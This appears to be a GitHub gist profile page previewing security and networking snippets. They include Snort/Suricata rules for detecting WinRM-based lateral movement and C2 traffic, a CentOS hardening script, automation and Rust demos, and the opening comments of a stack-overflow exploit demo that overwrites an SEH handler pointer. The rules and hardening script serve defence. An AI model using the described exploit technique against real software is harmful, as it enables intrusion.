Skip to content

Instantly share code, notes, and snippets.

View e3prom's full-sized avatar

Nicolas Chabbey e3prom

  • Switzerland
View GitHub Profile
@e3prom
e3prom / ep-postexpl-c2.rules
Created January 6, 2023 15:45
Snort/Suricata Additional C2/Post-Exploitation Ruleset
## Snort/Suricata Rules
## Provides additional detection of potential post-exploitation attacks, lateral-movements and C2 communication/beaconing.
alert http $EXTERNAL_NET any -> $HOME_NET 5985 (msg:"[EP] Windows Remote Management (WinRM)"; flow:established,to_server; content:"POST"; http_method; content:"/wsman"; nocase; pcre:"/\/wsman/"; classtype:policy-violation; sid:9001002; rev:1; metadata:created_at 2022_11_09, updated_at 2022_11_09;)
alert http $EXTERNAL_NET any -> $HOME_NET 5985 (msg:"[EP] WinRM Evil Client"; flow:established,to_server; content:"POST"; http_method; content:"Ruby WinRM Client"; nocase; http_user_agent; classtype:misc-attack; sid:9001003; rev:1; metadata:created_at 2022_11_09, updated_at 2022_11_09;)
alert tls $EXTERNAL_NET any -> $HOME_NET 5986 (msg:"[EP] Windows Remote Management (WinRM) over TLS"; flow:established,to_server; content:"|1603 01|"; fast_pattern; stream_size: client, >,0; stream_size: server, >,0; classtype:policy-violation; sid:9001004; rev:1; metadata:created_at 2022_
@e3prom
e3prom / centos8-syshardening-cispartial.sh
Created January 6, 2023 15:30
CentOS 8 System Hardening Script (CIS/Partial)
# CentOS 8 Hardening Script (CIS Benchmark Partial)
#!/bin/sh
### FILESYSTEMS
/bin/echo -n '[*] Disabling unneeded filesystems... '
/bin/echo 'install cramfs /bin/true' > /etc/modprobe.d/cramfs.conf
/bin/echo 'install squashfs /bin/true' > /etc/modprobe.d/squashfs.conf
/bin/echo 'install udf /bin/true' > /etc/modprobe.d/udf.conf
/bin/echo 'install usb-storage /bin/true' > /etc/modprobe.d/usb-storage.conf
/bin/echo 'install iscsi_tcp /bin/true' > /etc/modprobe.d/iscsi_tcp.conf
#/bin/echo 'install libiscsi /bin/true' >> /etc/modprobe.d/iscsi_tcp.conf
@e3prom
e3prom / automation-ios-xe-ospf-restconf.py
Last active February 20, 2019 15:47
Simple automation script to configure OSPF from YANG data model, on IOS-XE using RESTCONF
#!/usr/bin/env python
# Automation skeleton for IOS-XE (RESCONF) with YANG
# Nicolas Chabbey <e3prom>
#
# conf/devices.conf:
# devices:
# - hostname: 10.240.0.180
# type: cisco-ios-xe
# port: 443
# verify: False
@e3prom
e3prom / rust-int-strings-ownership.rs
Last active February 20, 2019 15:36
A simple program to demonstrate ownership and pointers (de-)references with Rust.
fn main() {
// simple memory tests with integers (usually stored onto the stack).
// integers Types have the Copy Traits, therefore old variables are still
// available and can be referenced.
let x = 1;
let y = x;
println!("x stored at {:p} is {}, y stored at {:p} is {}", &x, x, &y, y);
// tests with immutable strings.
let s1 = "immutable";

Keybase proof

I hereby claim:

  • I am e3prom on github.
  • I am e3prom (https://keybase.io/e3prom) on keybase.
  • I have a public key ASDeEdU2gxUTwAsyTjq3s_tyPQH5T3ZZYWGLudhT241hpQo

To claim this, I am signing this object:

@e3prom
e3prom / win-x86-loadaddr.py
Created March 9, 2018 13:56
Load DLL in memory using the Windows API LoadLibrary() function and return base address.
'''
This script allow you to load a DLL using the Windows API 'LoadLibrary()' function
and returns it's load and relative text section virtual memory address.
You can specifiy multiple DLL files at once using the wildcard (globbing) character.
Note to self: next time use argparse instead of the *limited* getopt.
Coded with some love by e3prom <github.com/e3prom
'''
from ctypes import windll
@e3prom
e3prom / generic-stack-overflow-file-exploit.py
Created January 18, 2018 14:54
Demo exploit code for generic-stack-overflow-file.c, a basic stack-based overflow with SE handler pointer overwrite.
# generic-stack-overflow-file-exploit.py
# Sample exploit code for the generic-stack-overflow-file.c, available at:
# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
#
# Exploitability:
# There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
# The SE handler pointer points to a stack pivot.
# This exploit is a little bit messy, I do apologize.
import struct
file = 'crash.txt'